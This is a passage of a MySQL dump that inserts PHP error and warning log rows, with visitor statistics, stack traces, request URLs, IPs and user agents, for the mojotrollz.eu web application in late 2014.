[user_unique] => 1\n [ip_unique] => 87\n )\n\n [12] => Array\n (\n [day] => 2014-07-19 02:00:00\n [count] => 210\n [user_unique] => 1\n [ip_unique] => 99\n )\n\n [13] => Array\n (\n [day] => 2014-07-18 02:00:00\n [count] => 171\n [user_unique] => 1\n [ip_unique] => 105\n )\n\n [14] => Array\n (\n [day] => 2014-07-17 02:00:00\n [count] => 168\n [user_unique] => 1\n [ip_unique] => 113\n )\n\n [15] => Array\n (\n [day] => 2014-07-16 02:00:00\n [count] => 226\n [user_unique] => 1\n [ip_unique] => 96\n )\n\n [16] => Array\n (\n [day] => 2014-07-15 02:00:00\n [count] => 163\n [user_unique] => 1\n [ip_unique] => 100\n )\n\n [17] => Array\n (\n [day] => 2014-07-14 02:00:00\n [count] => 139\n [user_unique] => 1\n [ip_unique] => 93\n )\n\n [18] => Array\n (\n [day] => 2014-07-13 02:00:00\n [count] => 217\n [user_unique] => 1\n [ip_unique] => 87\n )\n\n [19] => Array\n (\n [day] => 2014-07-12 02:00:00\n [count] => 143\n [user_unique] => 1\n [ip_unique] => 91\n )\n\n [20] => Array\n (\n [day] => 2014-07-11 02:00:00\n [count] => 151\n [user_unique] => 1\n [ip_unique] => 91\n )\n\n [21] => Array\n (\n [day] => 2014-07-10 02:00:00\n [count] => 342\n [user_unique] => 1\n [ip_unique] => 110\n )\n\n [22] => Array\n (\n [day] => 2014-07-09 02:00:00\n [count] => 644\n [user_unique] => 1\n [ip_unique] => 96\n )\n\n [23] => Array\n (\n [day] => 2014-07-08 02:00:00\n [count] => 163\n [user_unique] => 1\n [ip_unique] => 106\n )\n\n [24] => Array\n (\n [day] => 2014-07-07 02:00:00\n [count] => 166\n [user_unique] => 2\n [ip_unique] => 90\n )\n\n [25] => Array\n (\n [day] => 2014-07-06 02:00:00\n [count] => 1088\n [user_unique] => 2\n [ip_unique] => 98\n )\n\n [26] => Array\n (\n [day] => 2014-07-05 02:00:00\n [count] => 153\n [user_unique] => 1\n [ip_unique] => 86\n )\n\n [27] => Array\n (\n [day] => 2014-07-04 02:00:00\n [count] => 180\n [user_unique] => 1\n [ip_unique] => 94\n )\n\n [28] => Array\n (\n [day] => 2014-07-03 02:00:00\n [count] => 147\n [user_unique] => 1\n [ip_unique] => 94\n )\n\n [29] => Array\n (\n [day] => 2014-07-02 02:00:00\n [count] => 841\n [user_unique] => 1\n [ip_unique] => 90\n )\n\n)\n', '2ec40ebc947f6bc037d035bfbbc4d0ec5d831fd7', 1, '/home/web/webdir/mojotrollz/system/sai/modules/saimod_sys_log/saimod_sys_log.php', 66, '#0 [internal function]: SYSTEM\\SAI\\saimod_sys_log::sai_mod__SYSTEM_SAI_saimod_sys_log_action_stats_name_basic_visitor(\'86400\', \'2014.7.db\')\n#1 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#2 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(22): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'\\\\SYSTEM\\\\SAI\\\\sai...\', Array, 42, true, false)\n#3 /home/web/webdir/mojotrollz/sai.php(17): SYSTEM\\SAI\\saigui->html()\n#4 {main}', '37.24.148.240', 0.39201, '2014-11-28 15:28:18', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_log&action=stats&name=basic_visitor&filter=86400&db=2014.7.db', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36', 10, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (388, 'SYSTEM\\LOG\\ERROR', 'Array\n(\n [0] => Array\n (\n [day] => 2014-08-31 02:00:00\n [count] => 163\n [user_unique] => 1\n [ip_unique] => 91\n )\n\n [1] => Array\n (\n [day] => 2014-08-30 02:00:00\n [count] => 122\n [user_unique] => 1\n [ip_unique] => 85\n )\n\n [2] => Array\n (\n [day] => 2014-08-29 02:00:00\n [count] => 158\n [user_unique] => 1\n [ip_unique] => 90\n )\n\n [3] => Array\n (\n [day] => 2014-08-28 02:00:00\n [count] => 173\n [user_unique] => 1\n [ip_unique] => 102\n )\n\n [4] => Array\n (\n [day] => 2014-08-27 02:00:00\n [count] => 125\n [user_unique] => 1\n [ip_unique] => 78\n )\n\n [5] => Array\n (\n [day] => 2014-08-26 02:00:00\n [count] => 118\n [user_unique] => 1\n [ip_unique] => 74\n )\n\n [6] => Array\n (\n [day] => 2014-08-25 02:00:00\n [count] => 317\n [user_unique] => 1\n [ip_unique] => 84\n )\n\n [7] => Array\n (\n [day] => 2014-08-24 02:00:00\n [count] => 203\n [user_unique] => 1\n [ip_unique] => 100\n )\n\n [8] => Array\n (\n [day] => 2014-08-23 02:00:00\n [count] => 123\n [user_unique] => 1\n [ip_unique] => 74\n )\n\n [9] => Array\n (\n [day] => 2014-08-22 02:00:00\n [count] => 139\n [user_unique] => 1\n [ip_unique] => 82\n )\n\n [10] => Array\n (\n [day] => 2014-08-21 02:00:00\n [count] => 526\n [user_unique] => 1\n [ip_unique] => 87\n )\n\n [11] => Array\n (\n [day] => 2014-08-20 02:00:00\n [count] => 163\n [user_unique] => 1\n [ip_unique] => 91\n )\n\n [12] => Array\n (\n [day] => 2014-08-19 02:00:00\n [count] => 166\n [user_unique] => 1\n [ip_unique] => 97\n )\n\n [13] => Array\n (\n [day] => 2014-08-18 02:00:00\n [count] => 155\n [user_unique] => 1\n [ip_unique] => 83\n )\n\n [14] => Array\n (\n [day] => 2014-08-17 02:00:00\n [count] => 141\n [user_unique] => 1\n [ip_unique] => 86\n )\n\n [15] => Array\n (\n [day] => 2014-08-16 02:00:00\n [count] => 166\n [user_unique] => 1\n [ip_unique] => 96\n )\n\n [16] => Array\n (\n [day] => 2014-08-15 02:00:00\n [count] => 424\n [user_unique] => 1\n [ip_unique] => 92\n )\n\n [17] => Array\n (\n [day] => 2014-08-14 02:00:00\n [count] => 183\n [user_unique] => 1\n [ip_unique] => 92\n )\n\n [18] => Array\n (\n [day] => 2014-08-13 02:00:00\n [count] => 170\n [user_unique] => 2\n [ip_unique] => 85\n )\n\n [19] => Array\n (\n [day] => 2014-08-12 02:00:00\n [count] => 182\n [user_unique] => 1\n [ip_unique] => 98\n )\n\n [20] => Array\n (\n [day] => 2014-08-11 02:00:00\n [count] => 183\n [user_unique] => 1\n [ip_unique] => 91\n )\n\n [21] => Array\n (\n [day] => 2014-08-10 02:00:00\n [count] => 134\n [user_unique] => 1\n [ip_unique] => 80\n )\n\n [22] => Array\n (\n [day] => 2014-08-09 02:00:00\n [count] => 166\n [user_unique] => 1\n [ip_unique] => 75\n )\n\n [23] => Array\n (\n [day] => 2014-08-08 02:00:00\n [count] => 158\n [user_unique] => 1\n [ip_unique] => 87\n )\n\n [24] => Array\n (\n [day] => 2014-08-07 02:00:00\n [count] => 249\n [user_unique] => 1\n [ip_unique] => 107\n )\n\n [25] => Array\n (\n [day] => 2014-08-06 02:00:00\n [count] => 208\n [user_unique] => 1\n [ip_unique] => 94\n )\n\n [26] => Array\n (\n [day] => 2014-08-05 02:00:00\n [count] => 197\n [user_unique] => 1\n [ip_unique] => 85\n )\n\n [27] => Array\n (\n [day] => 2014-08-04 02:00:00\n [count] => 237\n [user_unique] => 3\n [ip_unique] => 88\n )\n\n [28] => Array\n (\n [day] => 2014-08-03 02:00:00\n [count] => 987\n [user_unique] => 2\n [ip_unique] => 89\n )\n\n [29] => Array\n (\n [day] => 2014-08-02 02:00:00\n [count] => 2373\n [user_unique] => 3\n [ip_unique] => 89\n )\n\n)\n', '910b223d1838a51d380de0d259d1de8e42ba5be6', 1, '/home/web/webdir/mojotrollz/system/sai/modules/saimod_sys_log/saimod_sys_log.php', 66, '#0 [internal function]: SYSTEM\\SAI\\saimod_sys_log::sai_mod__SYSTEM_SAI_saimod_sys_log_action_stats_name_basic_visitor(\'86400\', \'2014.8.db\')\n#1 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#2 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(22): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'\\\\SYSTEM\\\\SAI\\\\sai...\', Array, 42, true, false)\n#3 /home/web/webdir/mojotrollz/sai.php(17): SYSTEM\\SAI\\saigui->html()\n#4 {main}', '37.24.148.240', 0.30001, '2014-11-28 15:28:25', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_log&action=stats&name=basic_visitor&filter=86400&db=2014.8.db', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36', 10, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (389, 'SYSTEM\\LOG\\ERROR', 'Array\n(\n [0] => Array\n (\n [day] => 2014-09-30 02:00:00\n [count] => 177\n [user_unique] => 1\n [ip_unique] => 95\n )\n\n [1] => Array\n (\n [day] => 2014-09-29 02:00:00\n [count] => 209\n [user_unique] => 1\n [ip_unique] => 98\n )\n\n [2] => Array\n (\n [day] => 2014-09-28 02:00:00\n [count] => 165\n [user_unique] => 1\n [ip_unique] => 94\n )\n\n [3] => Array\n (\n [day] => 2014-09-27 02:00:00\n [count] => 223\n [user_unique] => 1\n [ip_unique] => 90\n )\n\n [4] => Array\n (\n [day] => 2014-09-26 02:00:00\n [count] => 176\n [user_unique] => 1\n [ip_unique] => 98\n )\n\n [5] => Array\n (\n [day] => 2014-09-25 02:00:00\n [count] => 139\n [user_unique] => 1\n [ip_unique] => 90\n )\n\n [6] => Array\n (\n [day] => 2014-09-24 02:00:00\n [count] => 357\n [user_unique] => 1\n [ip_unique] => 104\n )\n\n [7] => Array\n (\n [day] => 2014-09-23 02:00:00\n [count] => 330\n [user_unique] => 1\n [ip_unique] => 91\n )\n\n [8] => Array\n (\n [day] => 2014-09-22 02:00:00\n [count] => 209\n [user_unique] => 1\n [ip_unique] => 104\n )\n\n [9] => Array\n (\n [day] => 2014-09-21 02:00:00\n [count] => 636\n [user_unique] => 2\n [ip_unique] => 95\n )\n\n [10] => Array\n (\n [day] => 2014-09-20 02:00:00\n [count] => 207\n [user_unique] => 1\n [ip_unique] => 93\n )\n\n [11] => Array\n (\n [day] => 2014-09-19 02:00:00\n [count] => 186\n [user_unique] => 1\n [ip_unique] => 107\n )\n\n [12] => Array\n (\n [day] => 2014-09-18 02:00:00\n [count] => 359\n [user_unique] => 1\n [ip_unique] => 90\n )\n\n [13] => Array\n (\n [day] => 2014-09-17 02:00:00\n [count] => 159\n [user_unique] => 1\n [ip_unique] => 92\n )\n\n [14] => Array\n (\n [day] => 2014-09-16 02:00:00\n [count] => 149\n [user_unique] => 1\n [ip_unique] => 87\n )\n\n [15] => Array\n (\n [day] => 2014-09-15 02:00:00\n [count] => 171\n [user_unique] => 1\n [ip_unique] => 94\n )\n\n [16] => Array\n (\n [day] => 2014-09-14 02:00:00\n [count] => 148\n [user_unique] => 1\n [ip_unique] => 84\n )\n\n [17] => Array\n (\n [day] => 2014-09-13 02:00:00\n [count] => 184\n [user_unique] => 1\n [ip_unique] => 98\n )\n\n [18] => Array\n (\n [day] => 2014-09-12 02:00:00\n [count] => 151\n [user_unique] => 1\n [ip_unique] => 90\n )\n\n [19] => Array\n (\n [day] => 2014-09-11 02:00:00\n [count] => 170\n [user_unique] => 1\n [ip_unique] => 105\n )\n\n [20] => Array\n (\n [day] => 2014-09-10 02:00:00\n [count] => 136\n [user_unique] => 1\n [ip_unique] => 93\n )\n\n [21] => Array\n (\n [day] => 2014-09-09 02:00:00\n [count] => 157\n [user_unique] => 1\n [ip_unique] => 87\n )\n\n [22] => Array\n (\n [day] => 2014-09-08 02:00:00\n [count] => 133\n [user_unique] => 1\n [ip_unique] => 89\n )\n\n [23] => Array\n (\n [day] => 2014-09-07 02:00:00\n [count] => 184\n [user_unique] => 1\n [ip_unique] => 96\n )\n\n [24] => Array\n (\n [day] => 2014-09-06 02:00:00\n [count] => 213\n [user_unique] => 1\n [ip_unique] => 92\n )\n\n [25] => Array\n (\n [day] => 2014-09-05 02:00:00\n [count] => 314\n [user_unique] => 1\n [ip_unique] => 88\n )\n\n [26] => Array\n (\n [day] => 2014-09-04 02:00:00\n [count] => 146\n [user_unique] => 1\n [ip_unique] => 88\n )\n\n [27] => Array\n (\n [day] => 2014-09-03 02:00:00\n [count] => 281\n [user_unique] => 1\n [ip_unique] => 93\n )\n\n [28] => Array\n (\n [day] => 2014-09-02 02:00:00\n [count] => 186\n [user_unique] => 1\n [ip_unique] => 88\n )\n\n [29] => Array\n (\n [day] => 2014-09-01 02:00:00\n [count] => 285\n [user_unique] => 1\n [ip_unique] => 85\n )\n\n)\n', 'aed942baf0878f810b8a7fbdc86b27e7cde05afd', 1, '/home/web/webdir/mojotrollz/system/sai/modules/saimod_sys_log/saimod_sys_log.php', 66, '#0 [internal function]: SYSTEM\\SAI\\saimod_sys_log::sai_mod__SYSTEM_SAI_saimod_sys_log_action_stats_name_basic_visitor(\'86400\', \'2014.9.db\')\n#1 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#2 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(22): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'\\\\SYSTEM\\\\SAI\\\\sai...\', Array, 42, true, false)\n#3 /home/web/webdir/mojotrollz/sai.php(17): SYSTEM\\SAI\\saigui->html()\n#4 {main}', '37.24.148.240', 0.16401, '2014-11-28 15:28:27', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_log&action=stats&name=basic_visitor&filter=86400&db=2014.9.db', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36', 10, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (390, 'SYSTEM\\LOG\\ERROR', 'Class not found: DBD\\GET_BASE_DATA_CREATURE', 'b1e14f31923160c484c37a7b89000c572211a662', 1, '/home/web/webdir/mojotrollz/system/system/autoload.php', 64, '#0 [internal function]: SYSTEM\\autoload::autoload(\'DBD\\\\GET_BASE_DA...\')\n#1 /home/web/webdir/mojotrollz/mojotrollz/api/database/creature/creature.php(17): spl_autoload_call(\'DBD\\\\GET_BASE_DA...\')\n#2 /home/web/webdir/mojotrollz/mojotrollz/page/user_start/user_start.php(55): creature::data(1500)\n#3 /home/web/webdir/mojotrollz/index.php(12): user_start->html()\n#4 {main}', '37.24.148.240', 0.092, '2014-11-28 16:52:12', 'www.mojotrollz.eu', 80, '/web/mojotrollz/?page=user_start&', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36', 10, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (391, 'SYSTEM\\LOG\\ERROR', 'Class not found: default_start', '4f408119317c680abb1bc6fd9ba0484debce7fc5', 1, '/home/web/webdir/mojotrollz/system/system/autoload.php', 64, '#0 [internal function]: SYSTEM\\autoload::autoload(\'default_start\')\n#1 /home/web/webdir/mojotrollz/mojotrollz/page/page_mojotrollz.php(12): spl_autoload_call(\'default_start\')\n#2 [internal function]: page_mojotrollz::page_wizard_start()\n#3 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#4 /home/web/webdir/mojotrollz/index.php(12): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'page_mojotrollz\', Array, 1, false, true)\n#5 {main}', '37.24.148.240', 0.008, '2014-11-28 17:01:03', 'www.mojotrollz.eu', 80, '/web/mojotrollz/?page=wizard_start&', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36', 0, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (392, 'SYSTEM\\LOG\\ERROR', 'No matching Cat \'skilltree_skill_grey\' found.', '05cdc62a2db464953a423e65d90f1476492ca807', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 15, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_frost_win...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_frost_win...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.240', 0.004, '2014-11-28 17:14:35', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skill_grey&id=spell_frost_windwalkon.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36', 0, b'0', 0, 2, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (421, 'SYSTEM\\LOG\\ERROR', 'API call is not implemented in API: sai_mod_saimod_mojotrollz_db_tags_action_creatures', 'ab9943c432804a24c682df203fd66fd1f085a15d', 1, '/home/web/webdir/mojotrollz/system/api/api.php', 101, '#0 /home/web/webdir/mojotrollz/system/api/api.php(56): SYSTEM\\API\\api::do_default(false, \'saimod_mojotrol...\', \'sai_mod_saimod_...\')\n#1 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(22): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'saimod_mojotrol...\', Array, 42, true, false)\n#2 /home/web/webdir/mojotrollz/sai.php(17): SYSTEM\\SAI\\saigui->html()\n#3 {main}', '37.24.148.242', 0.016, '2014-12-11 00:05:16', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=saimod_mojotrollz_db_tags&action=creatures', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0', 11, b'0', 0, 1, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (470, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'spell_holy_searingfire.png\' found.', '6de49dba29801b1e9469952621b092738a09c894', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'spell_holy_sear...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'spell_holy_sear...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.02, '2014-12-13 22:14:12', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills_grey&id=spell_holy_searingfire.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=1_050253210500150231_05050005001000000_00000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 2, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (396, 'SYSTEM\\LOG\\ERROR', 'Class not found: WOW_STATS_REALM_ONLINE', '9d696e85aa331ff6b80413b481731de55500e1e7', 1, '/home/mojotrolls/mojo_zero/src/web/system/system/autoload.php', 64, '#0 [internal function]: SYSTEM\\autoload::autoload(\'WOW_STATS_REALM...\')\n#1 /home/mojotrolls/mojo_zero/src/web/mojotrollz/api/realm/realm.php(5): spl_autoload_call(\'WOW_STATS_REALM...\')\n#2 /home/mojotrolls/mojo_zero/src/web/mojotrollz/page/wizard_start/wizard_start.php(17): realm::status()\n#3 /home/mojotrolls/mojo_zero/src/web/index.php(12): wizard_start->html()\n#4 {main}', '37.24.148.240', 0.032, '2014-11-29 14:22:18', 'hetznew.adiscon.com', 80, '/?page=wizard_start&', 'a:0:{}', 'http://hetznew.adiscon.com/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36', 0, b'0', 0, 5, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (855, 'SYSTEM\\LOG\\ERROR', 'Class not found: test', '1e01b801b1dea3ebe7817118b0dd22b22d6f667b', 1, '/home/web/webdir/mojotrollz/system/system/autoload.php', 64, '#0 [internal function]: SYSTEM\\autoload::autoload(\'test\')\n#1 [internal function]: spl_autoload_call(\'test\')\n#2 /home/web/webdir/mojotrollz/system/cron/cron.php(6): class_exists(\'test\')\n#3 /home/web/webdir/mojotrollz/system/cron/cron.php(41): SYSTEM\\CRON\\cron::check(\'test\')\n#4 /home/web/webdir/mojotrollz/system/sai/modules/saimod_sys_cron/saimod_sys_cron.php(11): SYSTEM\\CRON\\cron::next(\'test\')\n#5 [internal function]: SYSTEM\\SAI\\saimod_sys_cron::sai_mod__SYSTEM_SAI_saimod_sys_cron()\n#6 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#7 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(23): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'\\\\SYSTEM\\\\SAI\\\\sai...\', Array, 42, true, false)\n#8 /home/web/webdir/mojotrollz/sai.php(13): SYSTEM\\SAI\\saigui->html()\n#9 {main}', '37.24.148.242', 0.036, '2014-12-23 08:09:15', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_cron', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 10, b'0', 0, 3, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (499, 'SYSTEM\\LOG\\ERROR', 'No matching ID \'ability_druid_dash.png\' found.', '7fa6384d2decaff267c18064730ada4e6c2a3beb', 1, '/home/web/webdir/mojotrollz/system/files/files.php', 22, '#0 /home/web/webdir/mojotrollz/system/api/api_system.php(13): SYSTEM\\FILES\\files::get(\'skilltree_skill...\', \'ability_druid_d...\', true)\n#1 [internal function]: SYSTEM\\API\\api_system::call_files(\'skilltree_skill...\', \'ability_druid_d...\')\n#2 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#3 /home/web/webdir/mojotrollz/api.php(19): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'api_mojotrollz\', Array)\n#4 {main}', '37.24.148.242', 0.012, '2014-12-14 03:35:27', 'www.mojotrollz.eu', 80, '/web/mojotrollz/api.php?call=files&cat=skilltree_skills_grey&id=ability_druid_dash.png', 'a:0:{}', 'http://www.mojotrollz.eu/web/mojotrollz/sai.php?t=1_050253210500150231_05050005001000000_00000000000000000', 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0', 13, b'0', 0, 110, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (786, 'SYSTEM\\LOG\\ERROR', 'Could not query Database. Check ur Query Syntax or required Rights: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near \'? ORDER BY timestamp DESC\' at line 1', 'c5731a8775c40a974ba5740cffb7e7cd9cddde6b', 1, '/home/web/webdir/mojotrollz/system/db/connection/ConnectionMYS.php', 49, '#0 /home/web/webdir/mojotrollz/system/db/connection/Connection.php(43): SYSTEM\\DB\\ConnectionMYS->query(\'SELECT * FROM m...\')\n#1 /home/web/webdir/mojotrollz/system/db/qq/QQ.php(14): SYSTEM\\DB\\Connection->query(\'SELECT * FROM m...\')\n#2 /home/web/webdir/mojotrollz/mojotrollz/api/database/topics/topics.php(24): SYSTEM\\DB\\QQ::QQ(Array)\n#3 /home/web/webdir/mojotrollz/mojotrollz/page/user_nexus_menu_sub/user_nexus_menu_sub.php(28): topics::get_topics_by_newest()\n#4 /home/web/webdir/mojotrollz/index.php(12): user_nexus_menu_sub->html()\n#5 {main}', '93.204.70.97', 0.008, '2014-12-18 23:22:59', 'mojotrollz.eu', 80, '/web/mojotrollz/?page=user_nexus_menu_sub&menu=100&', 'a:0:{}', 'http://mojotrollz.eu/web/mojotrollz/', 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36', 11, b'0', 0, 4, 1, 0, NULL); INSERT INTO `system_todo` (`ID`, `class`, `message`, `message_hash`, `code`, `file`, `line`, `trace`, `ip`, `querytime`, `time`, `server_name`, `server_port`, `request_uri`, `post`, `http_referer`, `http_user_agent`, `user`, `thrown`, `type`, `count`, `state`, `priority`, `time_closed`) VALUES (393, 'SYSTEM\\LOG\\WARNING', 'Array\n(\n [datei_skilltree_skills] => Array\n (\n [name] => inv_weapon_halbard_01.png\n [type] => image/png\n [tmp_name] => /tmp/phpjGtI8N\n [error] => 0\n [size] => 4580\n )\n\n)\n', '41bba31300bcc553ac24a5e6138e815d37d94920', 1, '/home/web/webdir/mojotrollz/system/sai/modules/saimod_sys_files/saimod_sys_files.php', 20, '#0 [internal function]: SYSTEM\\SAI\\saimod_sys_files::sai_mod__SYSTEM_SAI_saimod_sys_files_action_upload(\'skilltree_skill...\')\n#1 /home/web/webdir/mojotrollz/system/api/api.php(59): call_user_func_array(Array, Array)\n#2 /home/web/webdir/mojotrollz/system/sai/sai/saigui.php(22): SYSTEM\\API\\api::run(\'\\\\SYSTEM\\\\API\\\\ver...\', \'\\\\SYSTEM\\\\SAI\\\\sai...\', Array, 42, true, false)\n#3 /home/web/webdir/mojotrollz/sai.php(17): SYSTEM\\SAI\\saigui->html()\n#4 {main}', '37.24.148.240', 0.016, '2014-11-28 18:43:12', 'www.mojotrollz.eu', 80, '/web/mojotrollz/sai.php?sai_mod=.SYSTEM.SAI.saimod_sys_files&action=upload&cat=skilltree_skills', 'a:0:{}', 